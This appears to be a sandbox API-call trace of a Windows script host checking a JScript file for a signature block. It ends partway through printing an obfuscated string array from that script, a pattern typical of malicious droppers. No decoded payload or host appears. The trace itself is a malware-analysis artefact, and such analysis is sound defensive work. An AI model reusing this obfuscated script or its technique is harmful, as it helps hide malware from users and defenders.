	[0096.435] wcsncmp (_String1="jh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0096.435] wcsncmp (_String1="h8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0096.435] wcsncmp (_String1="8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0096.435] wcsncmp (_String1="pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 99
	[0096.435] wcsncmp (_String1="asKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0096.435] wcsncmp (_String1="sKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.435] wcsncmp (_String1="KgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0X", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0096.435] wcsncmp (_String1="gV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0096.435] wcsncmp (_String1="V8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0096.435] wcsncmp (_String1="8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0096.435] wcsncmp (_String1="Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.435] wcsncmp (_String1="zb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0096.436] wcsncmp (_String1="b1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0096.436] wcsncmp (_String1="1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw6", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0096.436] wcsncmp (_String1="xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0096.436] wcsncmp (_String1="Zw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69D", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0096.436] wcsncmp (_String1="w7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.436] wcsncmp (_String1="7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0096.436] wcsncmp (_String1="jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0096.436] wcsncmp (_String1="Du8OwwrtSXDnDgMOwa0XCr8OAw69Dw79y", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.436] wcsncmp (_String1="u8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 104
	[0096.436] wcsncmp (_String1="8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0096.436] wcsncmp (_String1="OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.436] wcsncmp (_String1="wwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.436] wcsncmp (_String1="wrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.436] wcsncmp (_String1="rtSXDnDgMOwa0XCr8OAw69Dw79yA8OW',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0096.436] wcsncmp (_String1="tSXDnDgMOwa0XCr8OAw69Dw79yA8OW','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0096.436] wcsncmp (_String1="SXDnDgMOwa0XCr8OAw69Dw79yA8OW','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 70
	[0096.436] wcsncmp (_String1="XDnDgMOwa0XCr8OAw69Dw79yA8OW','w5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0096.436] wcsncmp (_String1="DnDgMOwa0XCr8OAw69Dw79yA8OW','w5/", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.436] wcsncmp (_String1="nDgMOwa0XCr8OAw69Dw79yA8OW','w5/C", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0096.436] wcsncmp (_String1="DgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.436] wcsncmp (_String1="gMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0096.436] wcsncmp (_String1="MOwa0XCr8OAw69Dw79yA8OW','w5/Cn8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0096.436] wcsncmp (_String1="Owa0XCr8OAw69Dw79yA8OW','w5/Cn8KK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.436] wcsncmp (_String1="wa0XCr8OAw69Dw79yA8OW','w5/Cn8KKb", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.436] wcsncmp (_String1="a0XCr8OAw69Dw79yA8OW','w5/Cn8KKbM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0096.436] wcsncmp (_String1="0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 35
	[0096.436] wcsncmp (_String1="XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0096.436] wcsncmp (_String1="Cr8OAw69Dw79yA8OW','w5/Cn8KKbMK5H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0096.436] wcsncmp (_String1="r8OAw69Dw79yA8OW','w5/Cn8KKbMK5Hs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0096.436] wcsncmp (_String1="8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0096.436] wcsncmp (_String1="OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOe", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.436] wcsncmp (_String1="Aw69Dw79yA8OW','w5/Cn8KKbMK5HsOef", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0096.436] wcsncmp (_String1="w69Dw79yA8OW','w5/Cn8KKbMK5HsOefs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.436] wcsncmp (_String1="69Dw79yA8OW','w5/Cn8KKbMK5HsOefsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 41
	[0096.436] wcsncmp (_String1="9Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0096.436] wcsncmp (_String1="Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg'", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.436] wcsncmp (_String1="w79yA8OW','w5/Cn8KKbMK5HsOefsOg',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.437] wcsncmp (_String1="79yA8OW','w5/Cn8KKbMK5HsOefsOg','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 42
	[0096.437] wcsncmp (_String1="9yA8OW','w5/Cn8KKbMK5HsOefsOg','M", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 44
	[0096.437] wcsncmp (_String1="yA8OW','w5/Cn8KKbMK5HsOefsOg','ME", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 108
	[0096.437] wcsncmp (_String1="A8OW','w5/Cn8KKbMK5HsOefsOg','MEr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0096.437] wcsncmp (_String1="8OW','w5/Cn8KKbMK5HsOefsOg','MErC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0096.437] wcsncmp (_String1="OW','w5/Cn8KKbMK5HsOefsOg','MErCs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.437] wcsncmp (_String1="W','w5/Cn8KKbMK5HsOefsOg','MErCsE", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 74
	[0096.437] wcsncmp (_String1="','w5/Cn8KKbMK5HsOefsOg','MErCsEP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.437] wcsncmp (_String1=",'w5/Cn8KKbMK5HsOefsOg','MErCsEPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0096.437] wcsncmp (_String1="'w5/Cn8KKbMK5HsOefsOg','MErCsEPDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.437] wcsncmp (_String1="w5/Cn8KKbMK5HsOefsOg','MErCsEPDhc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.437] wcsncmp (_String1="5/Cn8KKbMK5HsOefsOg','MErCsEPDhcK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0096.437] wcsncmp (_String1="/Cn8KKbMK5HsOefsOg','MErCsEPDhcKa", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 34
	[0096.437] wcsncmp (_String1="Cn8KKbMK5HsOefsOg','MErCsEPDhcKac", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0096.437] wcsncmp (_String1="n8KKbMK5HsOefsOg','MErCsEPDhcKacR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0096.437] wcsncmp (_String1="8KKbMK5HsOefsOg','MErCsEPDhcKacRH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0096.437] wcsncmp (_String1="KKbMK5HsOefsOg','MErCsEPDhcKacRHC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0096.437] wcsncmp (_String1="KbMK5HsOefsOg','MErCsEPDhcKacRHCm", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0096.437] wcsncmp (_String1="bMK5HsOefsOg','MErCsEPDhcKacRHCmA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 85
	[0096.437] wcsncmp (_String1="MK5HsOefsOg','MErCsEPDhcKacRHCmA=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0096.437] wcsncmp (_String1="K5HsOefsOg','MErCsEPDhcKacRHCmA==", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0096.437] wcsncmp (_String1="5HsOefsOg','MErCsEPDhcKacRHCmA=='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 40
	[0096.437] wcsncmp (_String1="HsOefsOg','MErCsEPDhcKacRHCmA==',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0096.437] wcsncmp (_String1="sOefsOg','MErCsEPDhcKacRHCmA==','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.437] wcsncmp (_String1="OefsOg','MErCsEPDhcKacRHCmA==','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.437] wcsncmp (_String1="efsOg','MErCsEPDhcKacRHCmA==','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 88
	[0096.437] wcsncmp (_String1="fsOg','MErCsEPDhcKacRHCmA==','woz", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0096.437] wcsncmp (_String1="sOg','MErCsEPDhcKacRHCmA==','wozD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.437] wcsncmp (_String1="Og','MErCsEPDhcKacRHCmA==','wozDh", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.437] wcsncmp (_String1="g','MErCsEPDhcKacRHCmA==','wozDhs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 90
	[0096.437] wcsncmp (_String1="','MErCsEPDhcKacRHCmA==','wozDhsK", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.437] wcsncmp (_String1=",'MErCsEPDhcKacRHCmA==','wozDhsKi", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0096.437] wcsncmp (_String1="'MErCsEPDhcKacRHCmA==','wozDhsKiw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.437] wcsncmp (_String1="MErCsEPDhcKacRHCmA==','wozDhsKiwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0096.437] wcsncmp (_String1="ErCsEPDhcKacRHCmA==','wozDhsKiwrP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0096.437] wcsncmp (_String1="rCsEPDhcKacRHCmA==','wozDhsKiwrPD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0096.437] wcsncmp (_String1="CsEPDhcKacRHCmA==','wozDhsKiwrPDl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0096.437] wcsncmp (_String1="sEPDhcKacRHCmA==','wozDhsKiwrPDl8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.438] wcsncmp (_String1="EPDhcKacRHCmA==','wozDhsKiwrPDl8K", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 56
	[0096.438] wcsncmp (_String1="PDhcKacRHCmA==','wozDhsKiwrPDl8Kx", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0096.438] wcsncmp (_String1="DhcKacRHCmA==','wozDhsKiwrPDl8KxF", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.438] wcsncmp (_String1="hcKacRHCmA==','wozDhsKiwrPDl8KxFA", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0096.438] wcsncmp (_String1="cKacRHCmA==','wozDhsKiwrPDl8KxFAY", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0096.438] wcsncmp (_String1="KacRHCmA==','wozDhsKiwrPDl8KxFAY=", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0096.438] wcsncmp (_String1="acRHCmA==','wozDhsKiwrPDl8KxFAY='", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 84
	[0096.438] wcsncmp (_String1="cRHCmA==','wozDhsKiwrPDl8KxFAY=',", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0096.438] wcsncmp (_String1="RHCmA==','wozDhsKiwrPDl8KxFAY=','", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0096.438] wcsncmp (_String1="HCmA==','wozDhsKiwrPDl8KxFAY=','w", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0096.438] wcsncmp (_String1="CmA==','wozDhsKiwrPDl8KxFAY=','wo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 54
	[0096.438] wcsncmp (_String1="mA==','wozDhsKiwrPDl8KxFAY=','woH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 96
	[0096.438] wcsncmp (_String1="A==','wozDhsKiwrPDl8KxFAY=','woHD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0096.438] wcsncmp (_String1="==','wozDhsKiwrPDl8KxFAY=','woHDt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0096.438] wcsncmp (_String1="=','wozDhsKiwrPDl8KxFAY=','woHDt2", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0096.438] wcsncmp (_String1="','wozDhsKiwrPDl8KxFAY=','woHDt2Z", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.438] wcsncmp (_String1=",'wozDhsKiwrPDl8KxFAY=','woHDt2Zc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0096.438] wcsncmp (_String1="'wozDhsKiwrPDl8KxFAY=','woHDt2ZcP", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.438] wcsncmp (_String1="wozDhsKiwrPDl8KxFAY=','woHDt2ZcPM", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.438] wcsncmp (_String1="ozDhsKiwrPDl8KxFAY=','woHDt2ZcPMO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0096.438] wcsncmp (_String1="zDhsKiwrPDl8KxFAY=','woHDt2ZcPMOs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 109
	[0096.438] wcsncmp (_String1="DhsKiwrPDl8KxFAY=','woHDt2ZcPMOsG", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.438] wcsncmp (_String1="hsKiwrPDl8KxFAY=','woHDt2ZcPMOsGX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 91
	[0096.438] wcsncmp (_String1="sKiwrPDl8KxFAY=','woHDt2ZcPMOsGXt", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.438] wcsncmp (_String1="KiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0096.438] wcsncmp (_String1="iwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQ", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 92
	[0096.438] wcsncmp (_String1="wrPDl8KxFAY=','woHDt2ZcPMOsGXtZQc", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.438] wcsncmp (_String1="rPDl8KxFAY=','woHDt2ZcPMOsGXtZQcO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0096.438] wcsncmp (_String1="PDl8KxFAY=','woHDt2ZcPMOsGXtZQcOI", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0096.438] wcsncmp (_String1="Dl8KxFAY=','woHDt2ZcPMOsGXtZQcOIw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.438] wcsncmp (_String1="l8KxFAY=','woHDt2ZcPMOsGXtZQcOIwr", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0096.438] wcsncmp (_String1="8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 43
	[0096.438] wcsncmp (_String1="KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 62
	[0096.438] wcsncmp (_String1="xFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 107
	[0096.438] wcsncmp (_String1="FAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 57
	[0096.438] wcsncmp (_String1="AY=','woHDt2ZcPMOsGXtZQcOIwrnDj1l", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 52
	[0096.438] wcsncmp (_String1="Y=','woHDt2ZcPMOsGXtZQcOIwrnDj1lV", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 76
	[0096.438] wcsncmp (_String1="=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVN", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 48
	[0096.439] wcsncmp (_String1="','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNs", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.439] wcsncmp (_String1=",'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsO", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 31
	[0096.439] wcsncmp (_String1="'woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOU", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 26
	[0096.439] wcsncmp (_String1="woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOUR", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.439] wcsncmp (_String1="oHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURH", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 98
	[0096.439] wcsncmp (_String1="HDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHf", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0096.439] wcsncmp (_String1="Dt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.439] wcsncmp (_String1="t2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDg", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0096.439] wcsncmp (_String1="2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 37
	[0096.439] wcsncmp (_String1="ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0096.439] wcsncmp (_String1="cPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0k", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0096.439] wcsncmp (_String1="PMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 67
	[0096.439] wcsncmp (_String1="MOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 64
	[0096.439] wcsncmp (_String1="OsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4t", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.439] wcsncmp (_String1="sGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.439] wcsncmp (_String1="GXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 58
	[0096.439] wcsncmp (_String1="XtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 75
	[0096.439] wcsncmp (_String1="tZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4R", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 103
	[0096.439] wcsncmp (_String1="ZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RS", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 77
	[0096.439] wcsncmp (_String1="QcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 68
	[0096.439] wcsncmp (_String1="cOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 86
	[0096.439] wcsncmp (_String1="OIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7H", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.439] wcsncmp (_String1="IwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 60
	[0096.439] wcsncmp (_String1="wrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 106
	[0096.439] wcsncmp (_String1="rnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 101
	[0096.439] wcsncmp (_String1="nDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 97
	[0096.439] wcsncmp (_String1="Dj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Om", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.439] wcsncmp (_String1="j1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 93
	[0096.439] wcsncmp (_String1="1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 36
	[0096.439] wcsncmp (_String1="lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5J", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 95
	[0096.439] wcsncmp (_String1="VNsOURHfDgl0kw4tDw4RSw7HCn8Omw5Jp", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 73
	[0096.439] wcsncmp (_String1="NsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpX", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 65
	[0096.439] wcsncmp (_String1="sOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXD", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 102
	[0096.439] wcsncmp (_String1="OURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDo", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 66
	[0096.439] wcsncmp (_String1="URHfDgl0kw4tDw4RSw7HCn8Omw5JpXDot", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 72
	[0096.439] wcsncmp (_String1="RHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 69
	[0096.440] wcsncmp (_String1="HfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 59
	[0096.440] wcsncmp (_String1="fDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 89
	[0096.440] wcsncmp (_String1="Dgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7", _String2="\r\n// SIG // Begin signature block", _MaxCount=0x21) returned 55
	[0096.441] ComputeAccessTokenFromCodeAuthzLevel () returned 0x1
	[0096.441] CloseCodeAuthzLevel () returned 0x1
	[0096.441] FreeLibrary (hLibModule=0x7fefd710000) returned 1
	[0096.441] ??2@YAPEAX_K@Z () returned 0x42f3f0
	[0096.442] SysStringLen (param_1="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKn